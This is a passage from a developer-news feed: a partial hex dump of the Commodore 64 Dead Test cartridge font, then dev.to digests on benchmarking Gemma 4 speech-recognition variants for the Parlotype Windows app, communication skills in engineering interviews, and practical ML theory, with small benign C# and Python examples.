The Dead Test cartridge uses the same trick to circumvent the built-in ROMs of the C64: it’s an 8K Ultimax cartridge with ROM code at $E000–$FFFF and a start address (reset vector) of $E000.
The font (i.e., the character matrices) is implemented starting at $EAD8 with the remaining cartridge space filled with $AA:
58 character matrices (screen codes $00-$39) screen code $00 EAD8: 00 ; ........ EAD9: 00 ; ........ EADA: 00 ; ........ EADB: 00 ; ........ EADC: 00 ; ........ EADD: 00 ; ........ EADE: 00 ; ........ EADF: 00 ; ........ screen code $01 EAE0: 7E ; .******. EAE1: 42 ; .*....*. EAE2: 42 ; .*....*. EAE3: 7E ; .******. EAE4: 46 ; .*...**. EAE5: 46 ; .*...**. EAE6: 46 ; .*...**. EAE7: 00 ; ........ screen code $02 EAE8: 7E ; .******. EAE9: 62 ; .**...*. EAEA: 62 ; .**...*. EAEB: 7E ; .******. EAEC: 62 ; .**...*. EAED: 62 ; .**...*. EAEE: 7E ; .******. EAEF: 00 ; ........ screen code $03 EAF0: 7E ; .******. EAF1: 42 ; .*....*. EAF2: 40 ; .*...... EAF3: 40 ; .*...... EAF4: 40 ; .*...... EAF5: 42 ; .*....*. EAF6: 7E ; .******. EAF7: 00 ; ........ screen code $04 EAF8: 7E ; .******. EAF9: 42 ; .*....*. EAFA: 42 ; .*....*. EAFB: 62 ; .**...*. EAFC: 62 ; .**...*. EAFD: 62 ; .**...*. EAFE: 7E ; .******. EAFF: 00 ; ........ screen code $05 EB00: 7E ; .******. EB01: 60 ; .**..... EB02: 60 ; .**..... EB03: 78 ; .****... EB04: 70 ; .***.... EB05: 70 ; .***.... EB06: 7E ; .******. EB07: 00 ; ........ screen code $06 EB08: 7E ; .******. EB09: 60 ; .**..... EB0A: 60 ; .**..... EB0B: 78 ; .****... EB0C: 70 ; .***.... EB0D: 70 ; .***.... EB0E: 70 ; .***.... EB0F: 00 ; ........ screen code $07 EB10: 7E ; .******. EB11: 42 ; .*....*. EB12: 40 ; .*...... EB13: 6E ; .**.***. EB14: 62 ; .**...*. EB15: 62 ; .**...*. EB16: 7E ; .******. EB17: 00 ; ........ screen code $08 EB18: 42 ; .*....*. EB19: 42 ; .*....*. EB1A: 42 ; .*....*. EB1B: 7E ; .******. EB1C: 62 ; .**...*. EB1D: 62 ; .**...*. EB1E: 62 ; .**...*. EB1F: 00 ; ........ screen code $09 EB20: 10 ; ...*.... EB21: 10 ; ...*.... EB22: 10 ; ...*.... EB23: 18 ; ...**... EB24: 18 ; ...**... EB25: 18 ; ...**... EB26: 18 ; ...**... EB27: 00 ; ........ screen code $0A EB28: 04 ; .....*.. EB29: 04 ; .....*.. EB2A: 04 ; .....*.. EB2B: 06 ; .....**. EB2C: 06 ; .....**. EB2D: 66 ; .**..**. EB2E: 7E ; .******. EB2F: 00 ; ........ 
screen code $0B EB30: 42 ; .*....*. EB31: 44 ; .*...*.. EB32: 48 ; .*..*... EB33: 7E ; .******. EB34: 66 ; .**..**. EB35: 66 ; .**..**. EB36: 66 ; .**..**. EB37: 00 ; ........ screen code $0C EB38: 40 ; .*...... EB39: 40 ; .*...... EB3A: 40 ; .*...... EB3B: 60 ; .**..... EB3C: 60 ; .**..... EB3D: 60 ; .**..... EB3E: 7E ; .******. EB3F: 00 ; ........ screen code $0D EB40: 43 ; .*....** EB41: 67 ; .**..*** EB42: 5B ; .*.**.** EB43: 43 ; .*....** EB44: 43 ; .*....** EB45: 43 ; .*....** EB46: 43 ; .*....** EB47: 00 ; ........ screen code $0E EB48: E2 ; ***...*. EB49: D2 ; **.*..*. EB4A: CA ; **..*.*. EB4B: C6 ; **...**. EB4C: C2 ; **....*. EB4D: C2 ; **....*. EB4E: C2 ; **....*. EB4F: 00 ; ........ screen code $0F EB50: 7E ; .******. EB51: 42 ; .*....*. EB52: 42 ; .*....*. EB53: 46 ; .*...**. EB54: 46 ; .*...**. EB55: 46 ; .*...**. EB56: 7E ; .******. EB57: 00 ; ........ screen code $10 EB58: 7E ; .******. EB59: 42 ; .*....*. EB5A: 42 ; .*....*. EB5B: 7E ; .******. EB5C: 60 ; .**..... EB5D: 60 ; .**..... EB5E: 60 ; .**..... EB5F: 00 ; ........ screen code $11 EB60: 7E ; .******. EB61: 42 ; .*....*. EB62: 42 ; .*....*. EB63: 62 ; .**...*. EB64: 6A ; .**.*.*. EB65: 66 ; .**..**. EB66: 7E ; .******. EB67: 00 ; ........ screen code $12 EB68: 7E ; .******. EB69: 42 ; .*....*. EB6A: 42 ; .*....*. EB6B: 7E ; .******. EB6C: 68 ; .**.*... EB6D: 64 ; .**..*.. EB6E: 62 ; .**...*. EB6F: 00 ; ........ screen code $13 EB70: 7E ; .******. EB71: 42 ; .*....*. EB72: 40 ; .*...... EB73: 7E ; .******. EB74: 02 ; ......*. EB75: 62 ; .**...*. EB76: 7E ; .******. EB77: 00 ; ........ screen code $14 EB78: 7E ; .******. EB79: 18 ; ...**... EB7A: 18 ; ...**... EB7B: 18 ; ...**... EB7C: 18 ; ...**... EB7D: 18 ; ...**... EB7E: 18 ; ...**... EB7F: 00 ; ........ screen code $15 EB80: 62 ; .**...*. EB81: 62 ; .**...*. EB82: 62 ; .**...*. EB83: 62 ; .**...*. EB84: 62 ; .**...*. EB85: 62 ; .**...*. EB86: 3C ; ..****.. EB87: 00 ; ........ screen code $16 EB88: 62 ; .**...*. EB89: 62 ; .**...*. 
EB8A: 62 ; .**...*. EB8B: 62 ; .**...*. EB8C: 62 ; .**...*. EB8D: 24 ; ..*..*.. EB8E: 18 ; ...**... EB8F: 00 ; ........ screen code $17 EB90: C2 ; **....*. EB91: C2 ; **....*. EB92: C2 ; **....*. EB93: C2 ; **....*. EB94: DA ; **.**.*. EB95: E6 ; ***..**. EB96: C2 ; **....*. EB97: 00 ; ........ screen code $18 EB98: 62 ; .**...*. EB99: 62 ; .**...*. EB9A: 24 ; ..*..*.. EB9B: 18 ; ...**... EB9C: 24 ; ..*..*.. EB9D: 62 ; .**...*. EB9E: 62 ; .**...*. EB9F: 00 ; ........ screen code $19 EBA0: 62 ; .**...*. EBA1: 62 ; .**...*. EBA2: 62 ; .**...*. EBA3: 34 ; ..**.*.. EBA4: 18 ; ...**... EBA5: 18 ; ...**... EBA6: 18 ; ...**... EBA7: 00 ; ........ screen code $1A EBA8: 7F ; .******* EBA9: 03 ; ......** EBAA: 06 ; .....**. EBAB: 08 ; ....*... EBAC: 10 ; ...*.... EBAD: 60 ; .**..... EBAE: 7F ; .******* EBAF: 00 ; ........ screen code $1B EBB0: 3C ; ..****.. EBB1: 30 ; ..**.... EBB2: 30 ; ..**.... EBB3: 30 ; ..**.... EBB4: 30 ; ..**.... EBB5: 30 ; ..**.... EBB6: 3C ; ..****.. EBB7: 00 ; ........ screen code $1C EBB8: 0E ; ....***. EBB9: 10 ; ...*.... EBBA: 30 ; ..**.... EBBB: FE ; *******. EBBC: 30 
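The dot patterns in the listing follow directly from the bytes: each character is 8 bytes, one per row, with the most significant bit as the leftmost pixel. A minimal Python sketch of that decoding, assuming only the base address $EAD8 and the byte values shown above (the helper names are hypothetical):

```python
FONT_BASE = 0xEAD8      # start of the character matrices, as stated above
BYTES_PER_GLYPH = 8     # one byte per pixel row


def glyph_address(screen_code):
    """Address of the first row byte for a given screen code."""
    return FONT_BASE + BYTES_PER_GLYPH * screen_code


def render_row(byte):
    """Turn one row byte into the '*' / '.' notation used in the listing."""
    return "".join("*" if byte & (0x80 >> bit) else "." for bit in range(8))


def render_glyph(rows):
    """Render all rows of a glyph, one line of text per byte."""
    return "\n".join(render_row(b) for b in rows)


# Screen code $01 ("A"), bytes copied from the listing at $EAE0-$EAE7.
GLYPH_A = [0x7E, 0x42, 0x42, 0x7E, 0x46, 0x46, 0x46, 0x00]

if __name__ == "__main__":
    print(f"screen code $01 starts at ${glyph_address(0x01):04X}")
    print(render_glyph(GLYPH_A))
```

By the same arithmetic, the mystery character at screen code $21 would start at $EBE0.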

---
## Shipping Gemma 4 speech recognition in a Windows .NET desktop app: a 5-variant model-selection tour

> Published: 2026-05-24 03:51:31+00:00
> Source: https://dev.to/mdemin729/shipping-gemma-4-speech-recognition-in-a-windows-net-desktop-app-a-5-variant-model-selection-tour-2l8i
> wpnews: https://wpnews.pro/news/shipping-gemma-4-speech-recognition-in-a-windows-net-desktop-app-a-5-variant

The article describes integrating Google's Gemma 4 speech recognition model into Parlotype, a privacy-focused Windows voice-to-text desktop app that runs entirely on-device. The author evaluated five available GGUF variants of Gemma 4 (E2B and E4B in BF16, Q4_K_M, and Q8_0 formats) against Whisper models on LibriSpeech test-other samples to determine the best combination of accuracy, speed, and disk footprint. The chosen runtime was llama-server due to its cross-vendor GPU support, no Python dependency, and stable HTTP API, with the final model selection and benchmark data published in the project's documentation.

*This is a submission for the Gemma 4 Challenge: Build with Gemma 4*

## What I Built

**Parlotype** is a voice-to-text desktop app for Windows. It is built with .NET 10 and Avalonia UI. You hold a global hotkey, speak, then release it. Your text appears in whatever app you were typing into. All speech recognition runs on your machine. No cloud, no audio leaves the machine.

Google released Gemma 4 in April 2026. It has a native multimodal audio path. I added it as an alternative speech engine alongside the existing Whisper.net pipeline. You pick Whisper or Gemma 4 in Settings. The rest of the audio pipeline (WASAPI capture, then Silero VAD, then text injection) stays the same.

The interesting part, and what this post is mostly about, is which Gemma 4 variant to ship. The `ggml-org` GGUF repo publishes five variants (E2B and E4B, each in BF16, Q4_K_M, and Q8_0, except where the repo skips one). The model card does not tell you which combination of accuracy, speed, and disk footprint you will actually get. So I ran each one on the same dataset, picked a default, and shipped.

## Demo

The video shows the engine selector, the model picker with five variants, and a live dictation with Gemma 4.

## Code

Source, ADRs, and benchmark configs: [github.com/mdemin729/parlotype](https://github.com/mdemin729/parlotype)

Relevant entry points:

- `src/Parlotype.Platform/Speech/LlamaCppSpeechRecognizer.cs`: the recognizer that talks to `llama-server`.
- `src/Parlotype.Core/Speech/Gemma4ModelInfo.cs`: the 5-variant catalog.
- `docs/decisions/025-gemma4-llamacpp-desktop.md` through `030-configurable-gemma4-prompts.md`: the ADR series covering the integration.
- `results/comparison-libri-speech-test-other-2026-05-23-cuda.md`: the benchmark data behind the choices below.

## How I Used Gemma 4

### Why a separate engine at all

Whisper is great on clean read English. It gets noticeably worse on conversational or noisy audio. Gemma 4 has a conformer audio encoder. Google's own evaluations show it reaching 4.17% WER on LibriSpeech-test-clean, which is competitive with much larger Whisper variants. For a voice-to-text app, the typical user is dictating to themselves into a focused text field. That noise profile is closer to "clean read" than to "AMI meeting", so Gemma 4 is a real alternative. Giving people the choice felt right. Either way, privacy does not depend on which model is loaded.

### Why `llama-server` as the runtime

I looked at several inference paths before picking `llama-server`, the HTTP server from llama.cpp. The constraints were: no cloud, Windows desktop, single end-user installer, cross-vendor GPU support, no Python runtime in the user's install.

`onnxruntime-genai` does not support Gemma 4's architecture yet (per-layer embeddings, variable head dimensions). Tracking issue: [microsoft/onnxruntime-genai#2062](https://github.com/microsoft/onnxruntime-genai/issues/2062). A Python sidecar works, but it pulls Python and CUDA into the user's install. That is a non-starter for non-developer users. LLamaSharp's P/Invoke bindings lock you to one llama.cpp build at compile time, so switching from Vulkan to CUDA means re-compiling. Ollama does not support Gemma audio yet ([ollama/ollama#15333](https://github.com/ollama/ollama/issues/15333)). Lemonade is AMD-only.

`llama-server` with the pre-built Vulkan/CUDA Windows binaries hits all of these. Cross-vendor GPU support from one download. A stable OpenAI-compatible HTTP API at `/v1/chat/completions`, with `input_audio` blocks for audio. A release cadence I can manage from in-app updates. [ADR-025](https://github.com/mdemin729/parlotype/blob/gemma4-challenge/docs/decisions/025-gemma4-llamacpp-desktop.md) has the longer version of this decision.

### Picking a variant: the benchmark

The catalog has five variants. That is what `ggml-org/gemma-4-E2B-it-GGUF` and `ggml-org/gemma-4-E4B-it-GGUF` actually publish, not what I would ideally pick (see [ADR-029](https://github.com/mdemin729/parlotype/blob/gemma4-challenge/docs/decisions/029-gemma4-model-download-ui.md)):

| ModelId | GGUF | Size on disk (with bf16 mmproj) |
|---|---|---|
| `gemma-4-E2B-it-Q8_0` | E2B Q8_0 | ~5.5 GiB |
| `gemma-4-E2B-it-bf16` | E2B BF16 | ~9.6 GiB |
| `gemma-4-E4B-it-Q4_K_M` | E4B Q4_K_M | ~5.9 GiB |
| `gemma-4-E4B-it-Q8_0` | E4B Q8_0 | ~8.4 GiB |
| `gemma-4-E4B-it-bf16` | E4B BF16 | ~15 GiB |

E2B has no Q4_K_M. That asset does not exist in the repo. I learned this when manual testing returned a 404. After that, I rebuilt the catalog from the actual file lists on HuggingFace.

I ran each variant against Whisper (Small, Medium, LargeV3Turbo) on 50 samples of LibriSpeech `test-other`, which is the "harder" English split. Same machine, same warm-up methodology, both engines on CUDA. Whisper used greedy decoding (beam=1) so the runs are reproducible.

| Rank | Engine | Model | WER % | CER % | RTF | Model load (s) |
|---|---|---|---|---|---|---|
| 1 | Whisper (CUDA) | `LargeV3Turbo` | 11.48 | 4.97 | 0.055 | 1.31 |
| 2 | Whisper (CUDA) | `Medium` | 12.18 | 5.41 | 0.073 | 1.28 |
| 3 | Whisper (CUDA) | `Small` | 13.10 | 5.87 | 0.034 | 0.71 |
| 4 | Gemma 4 (llama.cpp) | `E2B-it-BF16` | 13.15 | 4.95 | 0.038 | 6.70 |
| 5 | Gemma 4 (llama.cpp) | `E4B-it-Q4_K_M` | 13.82 | 5.80 | 0.038 | 6.73 |
| 6 | Gemma 4 (llama.cpp) | `E4B-it-BF16` | 14.20 | 5.40 | 0.038 | 6.72 |
| 7 | Gemma 4 (llama.cpp) | `E4B-it-Q8_0` | 14.39 | 5.79 | 0.044 | 9.25 |
| 8 | Gemma 4 (llama.cpp) | `E2B-it-Q8_0` | 19.22 | 8.95 | 0.315 | 6.74 |

Three things from the table:

- `E2B-it-BF16` has the lowest CER of any model here (4.95%). It barely beats Whisper `LargeV3Turbo` (4.97%), but it still beats it. WER and CER do not always agree, and at this size class Gemma's character-level errors are unusually small.
- `E4B-it-Q4_K_M` (the shipping default) is at 13.82% WER and 0.038 RTF. That is close to Whisper `Small` (13.10% WER and 0.034 RTF) at about the same on-disk size. The Q4_K_M quant is the right floor for shipping. It gives people Gemma 4 without asking them to download 15 GiB.
- `E2B-it-Q8_0` is broken on this dataset. RTF 0.315, which is 8x slower than the other Gemma variants. WER 19.22%. The first benchmark attempt crashed `llama-server` mid-sample because the model emitted a stray `<|channel>` reasoning token that the chat-template parser could not handle. I keep this variant selectable in the catalog for experimentation, but the user-facing default avoids it.
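To see why WER and CER can disagree, it helps to compute both by hand. The sketch below uses the usual definitions (edit distance over words or characters divided by reference length, and RTF as processing time over audio duration). It is not the benchmark harness from the repo; any text normalization the real runs apply is not modeled here, and all function names are illustrative.

```python
def edit_distance(ref, hyp):
    """Levenshtein distance between two sequences (lists of words or strings)."""
    prev = list(range(len(hyp) + 1))
    for i, r in enumerate(ref, 1):
        cur = [i]
        for j, h in enumerate(hyp, 1):
            cur.append(min(
                prev[j] + 1,             # deletion
                cur[j - 1] + 1,          # insertion
                prev[j - 1] + (r != h),  # substitution (free if equal)
            ))
        prev = cur
    return prev[-1]


def wer(reference, hypothesis):
    """Word error rate: word-level edits divided by reference word count."""
    ref_words = reference.split()
    return edit_distance(ref_words, hypothesis.split()) / len(ref_words)


def cer(reference, hypothesis):
    """Character error rate: character-level edits divided by reference length."""
    return edit_distance(reference, hypothesis) / len(reference)


def rtf(processing_seconds, audio_seconds):
    """Real-time factor: below 1.0 means faster than real time."""
    return processing_seconds / audio_seconds


if __name__ == "__main__":
    ref, hyp = "the cat sat", "the cat sit"
    print(f"WER {wer(ref, hyp):.3f}  CER {cer(ref, hyp):.3f}")
```

In this toy pair a single wrong letter costs one word out of three but only one character out of eleven, so a model that makes many small spelling-level slips can rank worse on WER than on CER.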

### What I picked, and why

The shipping default is **`gemma-4-E4B-it-Q4_K_M`**. About 5.9 GiB on disk, 13.82% WER on this dataset, 0.038 RTF. E2B-BF16 is technically more accurate, but it takes 9.6 GiB. That is not worth it for a tiny WER edge. E4B Q8 and BF16 are there for people who want maximum accuracy and have the disk space. E2B-Q8 stays in the catalog with a "known issue" tag.

The model picker shows all five so people can experiment. But the default is the one I would install on a friend's machine without thinking about it.

## Architecture

Gemma 4 sits behind the same `ISpeechRecognizer` interface as Whisper. A `DelegatingSpeechRecognizer` (backed by a small `SpeechRecognizerFactory`) picks one or the other at init time, based on the user's engine setting. The `LlamaCppSpeechRecognizer` owns a child `llama-server.exe` process. It posts audio as a base64 WAV blob to `/v1/chat/completions`:

```csharp
// Excerpt from LlamaCppSpeechRecognizer.cs
var body = new
{
    messages = new[]
    {
        new
        {
            role = "user",
            content = new object[]
            {
                new { type = "text", text = promptText },
                new { type = "input_audio", input_audio = new { data = base64, format = "wav" } }
            }
        }
    },
    stream = false
};
using var response = await _httpClient.PostAsJsonAsync(
    "/v1/chat/completions", body, cancellationToken);
```
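For readers outside .NET, the same request body can be sketched in Python. This mirrors only what the C# excerpt shows (a text part, an `input_audio` part with base64 WAV data, `stream` set to false). The helper name `build_request_body` and the placeholder prompt are hypothetical, and actually sending the request is left out.

```python
import base64
import json


def build_request_body(wav_bytes, prompt_text):
    """Build the chat-completions payload shape used in the excerpt above."""
    audio_b64 = base64.b64encode(wav_bytes).decode("ascii")
    return {
        "messages": [
            {
                "role": "user",
                "content": [
                    {"type": "text", "text": prompt_text},
                    {
                        "type": "input_audio",
                        "input_audio": {"data": audio_b64, "format": "wav"},
                    },
                ],
            }
        ],
        "stream": False,
    }


if __name__ == "__main__":
    # Placeholder bytes stand in for a real WAV file; the prompt is made up.
    body = build_request_body(b"RIFF", "Transcribe the audio.")
    print(json.dumps(body, indent=2))
```

The resulting dictionary would be serialized as JSON and posted to `/v1/chat/completions` on the local `llama-server` process.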

Same capture, same VAD, different recognizer:

The `llama-server` binary itself is also managed by the app. [ADR-026](https://github.com/mdemin729/parlotype/blob/gemma4-challenge/docs/decisions/026-managed-llama-server-install.md) covers the catalog/installer/registry subsystem that downloads Vulkan or CUDA builds from llama.cpp's GitHub Releases on demand. Users do not pick paths in a folder browser. They pick a backend in a list and hit Install. That subsystem is about 1,800 lines on its own and probably deserves its own post.

The transcription prompt is also user-editable. [ADR-030](https://github.com/mdemin729/parlotype/blob/gemma4-challenge/docs/decisions/030-configurable-gemma4-prompts.md) turned the hardcoded prompt into a small registry with a built-in default and a `{language}` placeholder. The placeholder is there for a future feature that picks the source language from the active keyboard layout.

## What this taught me

Three things I learned from doing this:

- **The model card's headline numbers do not transfer to your stack.** Google's reported 4.17% WER on LibriSpeech-clean is real. But the path from "the model can do 4.17%" to "my app does 13.82% on noisy audio with the quantization that fits on user disks" goes through five variant choices, a runtime choice, and the measurement methodology. Benchmark on your own stack.
- **Most of the work is in the catalog, not in the inference call.** The actual `/v1/chat/completions` HTTP call is about 30 lines of code. The variant catalog, the download manager, the side-by-side install of llama-server backends, the prompt registry. That is where most of the engineering went.
- **Asymmetric quantization coverage is the rule, not the exception.** E2B has no Q4_K_M in the published GGUFs. The catalog has to reflect what is actually on HuggingFace, not what would be theoretically nicest.

## Try Parlotype

- Repo: [github.com/mdemin729/parlotype](https://github.com/mdemin729/parlotype)
- Windows only for now. .NET 10, MIT licensed.
- Pick Gemma 4 in Settings -> Speech Engine. The in-app installer downloads `llama-server` and the GGUF for you.

*Maksim Demin is a .NET engineer building Parlotype, a voice-to-text desktop app. He writes about cross-platform .NET, Avalonia, and local AI.*

---
## Engineers Don’t Fail Technical Interviews Because They’re Bad at Tech — They Fail Because They Ignore Communication

> Published: 2026-05-24 03:50:46+00:00
> Source: https://dev.to/sarim_nadeem_888180307df8/engineers-dont-fail-technical-interviews-because-theyre-bad-at-tech-they-fail-because-they-3hj1
> wpnews: https://wpnews.pro/news/engineers-dont-fail-technical-interviews-because-theyre-bad-at-tech-they-fail

The article argues that engineers often fail technical interviews and face career stagnation not due to a lack of technical skill, but because they neglect communication and soft skills. It emphasizes that engineering is fundamentally about reducing ambiguity between humans, and that poor communication—such as failing to ask clarifying questions or becoming emotionally attached to code—leads to costly mistakes and toxic work environments. The author concludes that companies hire problem-solvers who can connect technology to business needs, not just code generators.

The biggest engineering disasters are rarely caused by syntax errors. They are caused by misunderstandings, ego clashes, assumptions, silence, and poor communication.
A lot of junior engineers believe that becoming “technically strong” is enough.
So they:
And then...
They enter a technical interview.
Or a sprint planning meeting.
Or a production incident call.
Or a design review.
And suddenly:
The painful reality?
Engineering is not just about writing code. Engineering is about reducing ambiguity between humans.
And the engineers who ignore communication and soft skills eventually hit a wall.
There is a dangerous belief floating around in engineering culture:
“If you are technically good enough, everything else will automatically work out.”
It does not.
Some of the smartest engineers fail interviews, lose promotions, damage team trust, and create toxic work environments because they never learned how to:
A company is not hiring a code generator.
A company is hiring someone who can:
That changes everything.
Many junior engineers stay silent in meetings because they think:
“If I ask questions, people will think I am inexperienced.”
In reality?
Senior engineers usually respect thoughtful questions.
What actually hurts you is:
A wrong implementation caused by unclear communication is far more expensive than asking a “simple” question.
NASA’s Mars Climate Orbiter mission failed because one engineering team used imperial units while another used metric units.
The result?
A $125 million spacecraft was lost because of communication and coordination failures.
Not because engineers couldn’t code.
One of the fastest ways to stagnate as an engineer is becoming emotionally attached to your code.
A pull request review is not a war.
Yet many engineers react like this:
Strong engineers separate:
Your code being improved does not mean you are weak.
The engineers who grow the fastest are usually the ones who:
This mistake destroys technical interviews.
The interviewer asks:
“Why would you choose Redis here?”
And the candidate starts explaining:
But they never answer:
“What business problem does Redis solve in THIS scenario?”
Great engineers connect technology to:
Technology is a tool.
Problem solving is the actual job.
Once engineers gain a little experience, a new problem appears.
Ego.
Not always loud ego.
Sometimes subtle ego.
The kind that appears as:
Many engineers unknowingly optimize for appearing intelligent instead of being useful.
That leads to:
The best engineers often explain extremely complex systems using simple language.
Because clarity is a sign of mastery.
Not complexity.
People assume senior engineers have mastered communication.
That is not always true.
Some senior engineers become technically excellent but emotionally difficult to work with.
And that becomes a massive organizational bottleneck.
If junior engineers are afraid to:
then the team becomes slower and more fragile.
The best senior engineers create environments where:
A fearful team hides problems.
A healthy team surfaces problems early.
Technical disagreements are normal.
But immature engineers turn disagreements into:
Strong engineering culture focuses on:
Not personal victories.
One of the most revealing interview questions is:
“Tell me about a time you had a significant technical disagreement with a colleague.”
This question is not testing whether you were “right.”
It tests:
Many candidates accidentally fail this question.
Here is how weak candidates usually answer:
“My teammate wanted to use X technology, but I knew Y was better. I convinced everyone, and we used my solution.”
This answer silently communicates:
A mature response sounds more like this:
“We had different opinions regarding the architecture because we were optimizing for different constraints. Instead of debating emotionally, we listed the trade-offs, validated assumptions with data, and aligned on the approach that best matched the business priorities.”
Notice the difference.
The focus shifts from:
to:
That is what companies look for.
Anyone can appear confident when systems are stable.
Pressure reveals communication quality.
During outages and production incidents:
bad communication creates chaos.
Common failures include:
Strong engineers during incidents:
One of the most valuable engineering skills is the ability to explain complex technical ideas to:
If your explanation only makes sense to experts, then communication has failed.
A strong engineer can:
Most engineers are never taught how meetings actually work.
So meetings become:
Common mistakes:
Speaking more does not make you appear smarter.
Clear, structured communication does.
Many engineers listen only to respond.
Strong communicators listen to:
Ambiguity kills projects.
Good engineers clarify:
The highest-paid engineers are often not the people writing the most code.
They are the people who can:
Because organizations scale through communication.
Not just code.
One of the most tragic examples of communication failure in engineering history was the Space Shuttle Challenger disaster.
Engineers had concerns regarding the O-ring performance in cold temperatures.
But:
contributed to catastrophic decision-making.
The issue was not purely technical.
It was also communicational and organizational.
Engineering failures are often human failures first.
Instead of trying to sound intelligent, they optimize for clarity.
Good documentation is scalable communication.
Pretending to know everything destroys trust.
Professional maturity matters.
Engineering rarely has perfect solutions.
Only trade-offs.
Try explaining:
to non-technical people.
That forces clarity.
Writing improves thinking.
This is one reason strong engineers often:
Clear writing exposes unclear thinking.
Disagreement is normal.
Emotional escalation is optional.
Watch how experienced engineers:
This single habit improves:
The engineering world glorifies:
But many careers quietly collapse because engineers never learned how to:
The uncomfortable truth?
A technically average engineer with strong communication skills will often outperform a technically brilliant engineer who cannot work effectively with people.
Because modern engineering is a team sport.
Not a solo coding competition.
And the engineers who truly stand out are usually the ones who can:
That is what real engineering looks like.

---
## The 20% of ML theory that earns its keep in production

> Published: 2026-05-24 03:48:25+00:00
> Source: https://dev.to/thousand_miles_ai/the-20-of-ml-theory-that-earns-its-keep-in-production-184g
> wpnews: https://wpnews.pro/news/the-20-of-ml-theory-that-earns-its-keep-in-production

According to a recent discussion on r/learnmachinelearning, approximately 20% of machine learning theory is responsible for handling 80% of production work. The article identifies four key theoretical concepts—bias-variance tradeoff, regularization, loss function design, and probability calibration—as the most impactful for real-world deployment, while emphasizing that practical skills like data pipelines, observability, and system engineering ultimately determine whether the theory can be effectively applied.

A community thread on r/learnmachinelearning landed on a sharp claim this week: 20% of ML theory handles 80% of production work. The post — written by a data scientist six months into an engineering role — named the algorithms (logistic regression, gradient-boosted trees, transformers) and the shipping skills (Docker, SQL, data validation). It left the theory itself implicit. The four classical concepts below are what production reliably tests for, and what reliably falls away.
Bias-variance is taught as a U-curve and a training-set anecdote. In production it shows up earlier — as the forecast for whether a model will quietly degrade between offline metrics and live traffic. High-variance fits look brilliant on a held-out set and embarrass themselves on the long tail; high-bias fits look mediocre offline and stay mediocre live. The reason the framework earns its keep is that it answers the question every team asks in week three — "training looked fine, deployment didn't, why" — without inventing new vocabulary for the diagnosis.
The textbook frames regularization as a way to discourage large weights. The production frame is cheaper: regularization is the lever for "how much data does this model have, really, after the duplicates and the leakage are gone." Strong L2, larger dropout, smaller learning rates are the same answer to the same problem — the effective dataset is smaller than the row count suggests. Tuning regularization without first auditing data quality is how teams burn a week chasing a number that data cleaning would have moved more.
Most teams pick a loss function the way they pick a base image — once, by default, and never again. The classical concept that earns its keep is the inverse: the loss function is a product spec, written in math, that the optimizer takes literally. A fraud model shipped with vanilla cross-entropy is telling the optimizer that catching one extra true positive is worth nine extra false positives, and then everyone is surprised when human reviewers drown in alerts. Naming the asymmetry — class weights, focal loss, an explicit cost matrix — is the smallest theoretical move with the largest downstream effect.
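One way to name the asymmetry is a positive-class weight on binary cross-entropy. The sketch below is a plain-Python illustration, not a recommendation for any particular framework. The function name `weighted_bce` and the weight of 9 are assumptions chosen to echo the fraud example, and `pos_weight=1.0` gives the unweighted loss.

```python
import math


def weighted_bce(y_true, p_pred, pos_weight=1.0):
    """Mean binary cross-entropy with an extra weight on the positive class.

    pos_weight > 1 makes a missed positive (e.g. undetected fraud) cost more
    than an equally confident false alarm.
    """
    eps = 1e-12  # keep log() away from 0
    total = 0.0
    for y, p in zip(y_true, p_pred):
        p = min(max(p, eps), 1.0 - eps)
        total += -(pos_weight * y * math.log(p) + (1 - y) * math.log(1.0 - p))
    return total / len(y_true)


if __name__ == "__main__":
    missed_fraud = ([1], [0.1])   # true positive scored at 0.1
    false_alarm = ([0], [0.9])    # true negative scored at 0.9
    for w in (1.0, 9.0):
        print(
            f"pos_weight={w}: missed fraud {weighted_bce(*missed_fraud, pos_weight=w):.3f}, "
            f"false alarm {weighted_bce(*false_alarm, pos_weight=w):.3f}"
        )
```

With `pos_weight=9`, the missed fraud case costs nine times what it does under the unweighted loss, while the false alarm cost is unchanged. That ratio is the product decision; the optimizer only follows it.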
The metric on the dashboard is accuracy or AUC. The metric the downstream system actually consumes is a probability — a 0.84 score that some other service multiplies by an expected-value estimate, or that a threshold rule converts into an action. Models can score well on AUC and still be wildly miscalibrated, returning 0.9 confidence on events that resolve true 60% of the time. A reliability diagram or a quick Platt-scaling pass takes an afternoon and forecloses the most common production failure mode for any model whose score is going to be multiplied by something later.
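The numbers behind a reliability diagram are simple to compute: bucket predictions by score, then compare the mean score in each bucket with how often the event actually happened. A minimal sketch in plain Python, with hypothetical function names and equal-width bins as an assumption:

```python
def reliability_bins(probs, outcomes, n_bins=10):
    """Group predictions into equal-width score bins.

    Returns a list of (mean predicted probability, observed frequency, count)
    for each non-empty bin.
    """
    bins = [[] for _ in range(n_bins)]
    for p, y in zip(probs, outcomes):
        idx = min(int(p * n_bins), n_bins - 1)  # p == 1.0 goes in the last bin
        bins[idx].append((p, y))
    rows = []
    for items in bins:
        if items:
            mean_conf = sum(p for p, _ in items) / len(items)
            observed = sum(y for _, y in items) / len(items)
            rows.append((mean_conf, observed, len(items)))
    return rows


def expected_calibration_error(probs, outcomes, n_bins=10):
    """Count-weighted average gap between confidence and observed frequency."""
    n = len(probs)
    return sum(
        abs(conf - obs) * count / n
        for conf, obs, count in reliability_bins(probs, outcomes, n_bins)
    )


if __name__ == "__main__":
    # The case from the text: 0.9 confidence, event true 60% of the time.
    probs = [0.9] * 10
    outcomes = [1] * 6 + [0] * 4
    print(reliability_bins(probs, outcomes))
    print(f"ECE = {expected_calibration_error(probs, outcomes):.2f}")
```

For that example the single occupied bin has a confidence near 0.9 against an observed rate of 0.6, a gap of about 0.3 that AUC alone would never surface.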
The four concepts above are theory. The Reddit thread is right that the day is mostly not theory — it is data pipelines, observability, on-call rotations, and the long discipline of evals that survive a model swap. Those skills decide whether the theory ever gets a chance to matter. For that systems half of the job, the original thread is the better read, and the comments below it — where practitioners argue about the algorithm list — are worth more than the post itself.
Source: 6 Months of ML Engineering: The 20% of theory that handles 80% of production code.

---
## WeiQi - (Go) game based productivity tool

> Published: 2026-05-24 03:43:27+00:00
> Source: https://dev.to/ssithub/weiqi-go-game-based-productivity-tool-35d8
> wpnews: https://wpnews.pro/news/weiqi-go-game-based-productivity-tool

